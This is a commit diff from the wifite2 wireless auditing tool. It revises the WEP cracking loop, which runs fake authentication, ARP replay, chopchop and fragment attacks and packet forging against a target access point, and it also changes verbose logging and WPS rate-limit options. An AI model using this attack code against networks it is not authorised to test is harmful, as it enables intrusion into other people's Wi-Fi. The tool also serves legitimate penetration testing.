alexandre/wifite2
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Lots of fixes.

Browse Source 
1. WEP attack gracefully handles ctrl+c
2. Very verbose (-vv) prints out commands and output
3. Doesn't fetch WPS info when attacking WEP
This commit is contained in:
derv82
2016-01-04 18:20:25 -05:00
parent c5ffac75c5
commit 3847f2c5c9
10 changed files with 242 additions and 175 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
py/Aireplay.py
View File

@@ -122,7 +122,7 @@ class Aireplay(object):
if attack_type == WEPAttackType.fakeauth:
cmd.extend(['-1', '0']) # Fake auth, no delay
cmd.extend(['-a', target.bssid])
cmd.extend(['-T', '1']) # Make 1 attemp
cmd.extend(['-T', '3']) # Make 3 attempts
if target.essid_known:
cmd.extend(['-e', target.essid])
# Do not specify client MAC address,

14
py/Airodump.py
View File

@@ -13,7 +13,7 @@ class Airodump(object):
def __init__(self, interface=None, channel=None, encryption=None,\
wps=False, target_bssid=None, output_file_prefix='airodump',\
ivs_only=False):
ivs_only=False, skip_wash=False):
'''
Sets up airodump arguments, doesn't start process yet
'''
@@ -39,6 +39,7 @@ class Airodump(object):
self.target_bssid = target_bssid
self.output_file_prefix = output_file_prefix
self.ivs_only = ivs_only
self.skip_wash = skip_wash
def __enter__(self):
@@ -133,8 +134,9 @@ class Airodump(object):
targets = Airodump.get_targets_from_csv(csv_filename)
# Check targets for WPS
capfile = csv_filename[:-3] + 'cap'
Wash.check_for_wps_and_update_targets(capfile, targets)
if not self.skip_wash:
capfile = csv_filename[:-3] + 'cap'
Wash.check_for_wps_and_update_targets(capfile, targets)
# Filter targets based on encryption
targets = Airodump.filter_targets(targets)
@@ -175,7 +177,11 @@ class Airodump(object):
if hit_clients:
# The current row corresponds to a "Client" (computer)
client = Client(row)
try:
client = Client(row)
except IndexError:
# Skip if we can't parse the client row
continue
if 'not associated' in client.bssid:
# Ignore unassociated clients

4
py/Arguments.py
View File

@@ -212,8 +212,8 @@ class Arguments(object):
% Configuration.wps_timeout_threshold)
wps.add_argument('--ignore-ratelimit',
action='store_false',
dest='wps_ignore_rate_limit',
help=Color.s('Continues attack if WPS is rate-limited (default: {G}off{W})'))
dest='wps_skip_rate_limit',
help=Color.s('Ignores attack if WPS is rate-limited (default: {G}on{W})'))
# Commands
commands = parser.add_argument_group('COMMANDS')

316
py/AttackWEP.py
View File

@@ -29,175 +29,201 @@ class AttackWEP(Attack):
Including airodump-ng starting, cracking, etc.
Returns: True if attack is succesful, false otherwise
'''
# First, start Airodump process
with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid,
ivs_only=True, # Only capture IVs packets
output_file_prefix='wep') as airodump:
Color.clear_line()
Color.p('\r{+} {O}waiting{W} for target to appear...')
airodump_target = self.wait_for_target(airodump)
aircrack = None # Aircrack process, not started yet
if self.fake_auth():
# We successfully authenticated!
# Use our interface's MAC address for the attacks.
client_mac = Interface.get_mac()
elif len(airodump_target.clients) == 0:
# There are no associated clients. Warn user.
Color.pl('{!} {O}there are no associated clients{W}')
Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' +
' without fake-authentication or associated clients{W}')
client_mac = None
else:
client_mac = airodump_target.clients[0].station
for (attack_index, attack_name) in enumerate(Configuration.wep_attacks):
# BIG try-catch to capture ctrl+c
try:
# Start Airodump process
with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid,
ivs_only=True, # Only capture IVs packets
skip_wash=True, # Don't check for WPS-compatibility
output_file_prefix='wep') as airodump:
aircrack = None # Aircrack process, not started yet
for attack_name in Configuration.wep_attacks:
# Convert to WEPAttackType.
wep_attack_type = WEPAttackType(attack_name)
replay_file = None
# Start Aireplay process.
aireplay = Aireplay(self.target, \
wep_attack_type, \
client_mac=client_mac, \
replay_file=replay_file)
time_unchanged_ivs = time.time() # Timestamp when IVs last changed
previous_ivs = 0
# Loop until attack completes.
while True:
Color.clear_line()
Color.p('\r{+} {O}waiting{W} for target to appear...')
airodump_target = self.wait_for_target(airodump)
Color.p('\r{+} running {C}%s{W} WEP attack ({G}%d IVs{W}) '
% (attack_name, airodump_target.ivs))
# Check if we cracked it.
if aircrack and aircrack.is_cracked():
(hex_key, ascii_key) = aircrack.get_key_hex_ascii()
bssid = airodump_target.bssid
if airodump_target.essid_known:
essid = airodump_target.essid
else:
essid = None
Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n'
% attack_name)
if aireplay:
aireplay.stop()
self.crack_result = CrackResultWEP(bssid, \
essid, \
hex_key, \
ascii_key)
self.crack_result.dump()
self.success = True
return self.success
if self.fake_auth():
# We successfully authenticated!
# Use our interface's MAC address for the attacks.
client_mac = Interface.get_mac()
elif len(airodump_target.clients) == 0:
# There are no associated clients. Warn user.
Color.pl('{!} {O}there are no associated clients{W}')
Color.pl('{!} {R}WARNING: {O}many attacks will not succeed' +
' without fake-authentication or associated clients{W}')
client_mac = None
else:
client_mac = airodump_target.clients[0].station
if aircrack and aircrack.is_running():
# Aircrack is running in the background.
Color.p('and {C}cracking{W}')
# Convert to WEPAttackType.
wep_attack_type = WEPAttackType(attack_name)
# Check number of IVs, crack if necessary
if airodump_target.ivs > Configuration.wep_crack_at_ivs:
if not aircrack:
# Aircrack hasn't started yet. Start it.
ivs_file = airodump.find_files(endswith='.ivs')[0]
aircrack = Aircrack(ivs_file)
replay_file = None
# Start Aireplay process.
aireplay = Aireplay(self.target, \
wep_attack_type, \
client_mac=client_mac, \
replay_file=replay_file)
elif not aircrack.is_running():
# Aircrack stopped running.
Color.pl('\n{!} {O}aircrack stopped running!{W}')
ivs_file = airodump.find_files(endswith='.ivs')[0]
Color.pl('{+} {C}aircrack{W} stopped,' +
' restarting {C}aircrack{W}')
aircrack = Aircrack(ivs_file)
time_unchanged_ivs = time.time() # Timestamp when IVs last changed
previous_ivs = 0
elif aircrack.is_running() and \
Configuration.wep_restart_aircrack > 0:
# Restart aircrack after X seconds
if aircrack.pid.running_time() > Configuration.wep_restart_aircrack:
aircrack.stop()
# Loop until attack completes.
while True:
airodump_target = self.wait_for_target(airodump)
Color.p('\r{+} running {C}%s{W} WEP attack ({G}%d IVs{W}) '
% (attack_name, airodump_target.ivs))
# Check if we cracked it.
if aircrack and aircrack.is_cracked():
(hex_key, ascii_key) = aircrack.get_key_hex_ascii()
bssid = airodump_target.bssid
if airodump_target.essid_known:
essid = airodump_target.essid
else:
essid = None
Color.pl('\n{+} {C}%s{W} WEP attack {G}successful{W}\n'
% attack_name)
if aireplay:
aireplay.stop()
self.crack_result = CrackResultWEP(bssid, \
essid, \
hex_key, \
ascii_key)
self.crack_result.dump()
self.success = True
return self.success
if aircrack and aircrack.is_running():
# Aircrack is running in the background.
Color.p('and {C}cracking{W}')
# Check number of IVs, crack if necessary
if airodump_target.ivs > Configuration.wep_crack_at_ivs:
if not aircrack:
# Aircrack hasn't started yet. Start it.
ivs_file = airodump.find_files(endswith='.ivs')[0]
Color.pl('\n{+} {C}aircrack{W} ran for more than' +
' {C}%d{W} seconds, restarting'
% Configuration.wep_restart_aircrack)
aircrack = Aircrack(ivs_file)
elif not aircrack.is_running():
# Aircrack stopped running.
Color.pl('\n{!} {O}aircrack stopped running!{W}')
ivs_file = airodump.find_files(endswith='.ivs')[0]
Color.pl('{+} {C}aircrack{W} stopped,' +
' restarting {C}aircrack{W}')
aircrack = Aircrack(ivs_file)
if not aireplay.is_running():
# Some Aireplay attacks loop infinitely
if attack_name == 'chopchop' or attack_name == 'fragment':
# We expect these to stop once a .xor is created,
# or if the process failed.
elif aircrack.is_running() and \
Configuration.wep_restart_aircrack > 0:
# Restart aircrack after X seconds
if aircrack.pid.running_time() > Configuration.wep_restart_aircrack:
aircrack.stop()
ivs_file = airodump.find_files(endswith='.ivs')[0]
Color.pl('\n{+} {C}aircrack{W} ran for more than' +
' {C}%d{W} seconds, restarting'
% Configuration.wep_restart_aircrack)
aircrack = Aircrack(ivs_file)
replay_file = None
# Check for .xor file.
xor_file = Aireplay.get_xor()
if not xor_file:
# If .xor is not there, the process failed.
Color.pl('\n{!} {O}%s attack{R} did not generate' +
' a .xor file{W}' % attack_name)
# XXX: For debugging
Color.pl('\noutput:\n')
Color.pl(aireplay.get_output())
Color.pl('')
break
if not aireplay.is_running():
# Some Aireplay attacks loop infinitely
if attack_name == 'chopchop' or attack_name == 'fragment':
# We expect these to stop once a .xor is created,
# or if the process failed.
# If .xor exists, run packetforge-ng to create .cap
Color.pl('\n{+} {C}%s attack{W}' % attack_name +
' generated a {C}.xor file{W}, {G}forging...{W}')
forge_file = Aireplay.forge_packet(xor_file,
airodump_target.bssid,
client_mac)
if forge_file:
replay_file = forge_file
Color.pl('{+} {C}forged packet{W},' +
' {G}replaying...{W}')
attack_name = 'forged arp replay'
aireplay = Aireplay(self.target, \
'forgedreplay', \
client_mac=client_mac, \
replay_file=replay_file)
continue
replay_file = None
# Check for .xor file.
xor_file = Aireplay.get_xor()
if not xor_file:
# If .xor is not there, the process failed.
Color.pl('\n{!} {O}%s attack{R} did not generate' % attack_name +
' a .xor file{W}')
# XXX: For debugging
Color.pl('\noutput:\n')
Color.pl(aireplay.get_output())
Color.pl('')
break
# If .xor exists, run packetforge-ng to create .cap
Color.pl('\n{+} {C}%s attack{W}' % attack_name +
' generated a {C}.xor file{W}, {G}forging...{W}')
forge_file = Aireplay.forge_packet(xor_file,
airodump_target.bssid,
client_mac)
if forge_file:
replay_file = forge_file
Color.pl('{+} {C}forged packet{W},' +
' {G}replaying...{W}')
attack_name = 'forged arp replay'
aireplay = Aireplay(self.target, \
'forgedreplay', \
client_mac=client_mac, \
replay_file=replay_file)
continue
else:
# Failed to forge packet. drop out
break
else:
# Failed to forge packet. drop out
break
else:
Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}')
Color.pl('\naireplay.get_output():')
Color.pl(aireplay.get_output())
break # Continue to other attacks
Color.pl('\n{!} {O}aireplay-ng exited unexpectedly{W}')
Color.pl('\naireplay.get_output():')
Color.pl(aireplay.get_output())
break # Continue to other attacks
# Check if IVs stopped flowing (same for > N seconds)
if airodump_target.ivs > previous_ivs:
time_unchanged_ivs = time.time()
elif Configuration.wep_restart_stale_ivs > 0 and \
attack_name != 'chopchop' and \
attack_name != 'fragment':
stale_seconds = time.time() - time_unchanged_ivs
if stale_seconds > Configuration.wep_restart_stale_ivs:
# No new IVs within threshold, restart aireplay
aireplay.stop()
Color.pl('\n{!} restarting {C}aireplay{W} after' +
' {C}%d{W} seconds of no new IVs'
% stale_seconds)
aireplay = Aireplay(self.target, \
wep_attack_type, \
client_mac=client_mac)
# Check if IVs stopped flowing (same for > N seconds)
if airodump_target.ivs > previous_ivs:
time_unchanged_ivs = time.time()
previous_ivs = airodump_target.ivs
elif Configuration.wep_restart_stale_ivs > 0 and \
attack_name != 'chopchop' and \
attack_name != 'fragment':
stale_seconds = time.time() - time_unchanged_ivs
if stale_seconds > Configuration.wep_restart_stale_ivs:
# No new IVs within threshold, restart aireplay
aireplay.stop()
Color.pl('\n{!} restarting {C}aireplay{W} after' +
' {C}%d{W} seconds of no new IVs'
% stale_seconds)
aireplay = Aireplay(self.target, \
wep_attack_type, \
client_mac=client_mac)
time_unchanged_ivs = time.time()
previous_ivs = airodump_target.ivs
time.sleep(1)
continue
# End of big while loop
# End of for-each-attack-type loop
# End of with-airodump
time.sleep(1)
continue
# End of big while loop
# End of with-airodump
except KeyboardInterrupt:
if not self.user_wants_to_continue(attack_index):
self.success = False
return self.success
# End of big try-catch
# End of for-each-attack-type loop
self.success = False
return self.success
def user_wants_to_continue(self, attack_index):
''' Asks user if attacks should continue using remaining methods '''
Color.pl('\n{!} {O}interrupted{W}\n')
if attack_index + 1 >= len(Configuration.wep_attacks):
# No more WEP attacks to perform.
return False
attacks_remaining = Configuration.wep_attacks[attack_index + 1:]
Color.pl("{+} {G}%d{W} attacks remain ({C}%s{W})" % (len(attacks_remaining), ', '.join(attacks_remaining)))
prompt = Color.s('{+} type {G}c{W} to {G}continue{W}' +
' or {R}s{W} to {R}stop{W}: ')
if raw_input(prompt).lower().startswith('s'):
return False
else:
return True
def fake_auth(self):
'''

1
py/AttackWPA.py
View File

@@ -33,6 +33,7 @@ class AttackWPA(Attack):
# First, start Airodump process
with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid,
skip_wash=True,
output_file_prefix='wpa') as airodump:
Color.clear_line()

11
py/AttackWPS.py
View File

@@ -124,11 +124,8 @@ class AttackWPS(Attack):
elif 'Detected AP rate limiting,' in stdout_last_line:
if Configuration.wps_skip_rate_limit:
Color.pl('{R}failed: {O}hit WPS rate-limit{W}')
# TODO: Argument for --ignore-rate-limit
'''
Color.pl('{!} {O}use {R}--ignore-rate-limit{O} to ignore' +
' this kind of failure in the future')
'''
Color.pl('{!} {O}use {R}--skip-rate-limit{O} to ignore' +
' this kind of failure in the future{W}')
break
step = '({C}step -/8{W}) waiting for AP rate limit'
@@ -261,9 +258,11 @@ class AttackWPS(Attack):
if 'Detected AP rate limiting' in out:
state = '{R}rate-limited{W}'
if not Configuration.wps_skip_rate_limit:
if Configuration.wps_skip_rate_limit:
Color.pl(state)
Color.pl('{!} {R}hit rate limit, stopping{W}\n')
Color.pl('{!} {O}use {R}--skip-rate-limit{O} to ignore' +
' this kind of failure in the future{W}')
break
if 'WARNING: Failed to associate with' in out:

8
py/Color.py
View File

@@ -48,6 +48,14 @@ class Color(object):
Color.p('%s\n' % text)
Color.last_sameline_length = 0
@staticmethod
def pe(text):
'''
Prints text using colored format with leading and trailing new line to STDERR.
'''
sys.stderr.write(Color.s('%s\n' % text))
Color.last_sameline_length = 0
@staticmethod
def s(text):
''' Returns colored string '''

2
py/Configuration.py
View File

@@ -193,7 +193,7 @@ class Configuration(object):
if args.wps_timeout_threshold:
Configuration.wps_timeout_threshold = args.wps_timeout_threshold
Color.pl('{+} {C}option:{W} will stop WPS attack after {G}%d timeouts{W}' % args.wps_timeout_threshold)
if args.wps_ignore_rate_limit == False:
if args.wps_skip_rate_limit == False:
Configuration.wps_skip_rate_limit = False
Color.pl('{+} {C}option:{W} will {G}continue{W} WPS attacks when rate-limited')

33
py/Process.py
View File

@@ -1,5 +1,8 @@
#!/usr/bin/python
from Configuration import Configuration
from Color import Color
from subprocess import Popen, call, PIPE
import time
@@ -20,20 +23,35 @@ class Process(object):
'''
if type(command) != str or ' ' in command or shell:
shell = True
if Configuration.verbose > 1:
Color.pe("\n {C}[?] {W} Executing (Shell): {B}%s{W}" % command)
else:
shell = False
if Configuration.verbose > 1:
Color.pe("\n {C}[?]{W} Executing: {B}%s{W}" % command)
pid = Popen(command, cwd=cwd, stdout=PIPE, stderr=PIPE, shell=shell)
pid.wait()
return pid.communicate()
(stdout, stderr) = pid.communicate()
if Configuration.verbose > 1 and stdout.strip() != '':
Color.pe("{P} [stdout] %s{W}" % '\n [stdout] '.join(stdout.split('\n')))
if Configuration.verbose > 1 and stderr.strip() != '':
Color.pe("{P} [stderr] %s{W}" % '\n [stderr] '.join(stderr.split('\n')))
return (stdout, stderr)
@staticmethod
def exists(program):
''' Checks if program is installed on this system '''
p = Process(['which', program])
if p.stdout().strip() == '' and p.stderr().strip() == '':
return False
return True
stdout = p.stdout().strip()
stderr = p.stderr().strip()
if stdout == '' and err == '':
return False
return True
def __init__(self, command, devnull=False, stdout=PIPE, stderr=PIPE, cwd=None):
''' Starts executing command '''
@@ -44,6 +62,9 @@ class Process(object):
self.command = command
if Configuration.verbose > 1:
Color.pe("\n {C}[?] {W} Executing: {B}%s{W}" % ' '.join(command))
self.out = None
self.err = None
if devnull:
@@ -68,11 +89,15 @@ class Process(object):
def stdout(self):
''' Waits for process to finish, returns stdout output '''
self.get_output()
if Configuration.verbose > 1 and self.out.strip() != '':
Color.pe("{P} [stdout] %s{W}" % '\n [stdout] '.join(self.out.split('\n')))
return self.out
def stderr(self):
''' Waits for process to finish, returns stderr output '''
self.get_output()
if Configuration.verbose > 1 and self.err.strip() != '':
Color.pe("{P} [stderr] %s{W}" % '\n [stderr] '.join(self.err.split('\n')))
return self.err
def get_output(self):

26
py/Scanner.py
View File

@@ -93,18 +93,20 @@ class Scanner(object):
if self.previous_target_count > 0:
# We need to "overwrite" the previous list of targets.
if self.previous_target_count > len(self.targets) or \
Scanner.get_terminal_height() < self.previous_target_count + 3:
# Either:
# 1) We have less targets than before, so we can't overwrite the previous list
# 2) The terminal can't display the targets without scrolling.
# Clear the screen.
from Process import Process
Process.call('clear')
else:
# We can fit the targets in the terminal without scrolling
# "Move" cursor up so we will print over the previous list
Color.pl(Scanner.UP_CHAR * (3 + self.previous_target_count))
if Configuration.verbose <= 1:
# Don't clear screen buffer in verbose mode.
if self.previous_target_count > len(self.targets) or \
Scanner.get_terminal_height() < self.previous_target_count + 3:
# Either:
# 1) We have less targets than before, so we can't overwrite the previous list
# 2) The terminal can't display the targets without scrolling.
# Clear the screen.
from Process import Process
Process.call('clear')
else:
# We can fit the targets in the terminal without scrolling
# "Move" cursor up so we will print over the previous list
Color.pl(Scanner.UP_CHAR * (3 + self.previous_target_count))
self.previous_target_count = len(self.targets)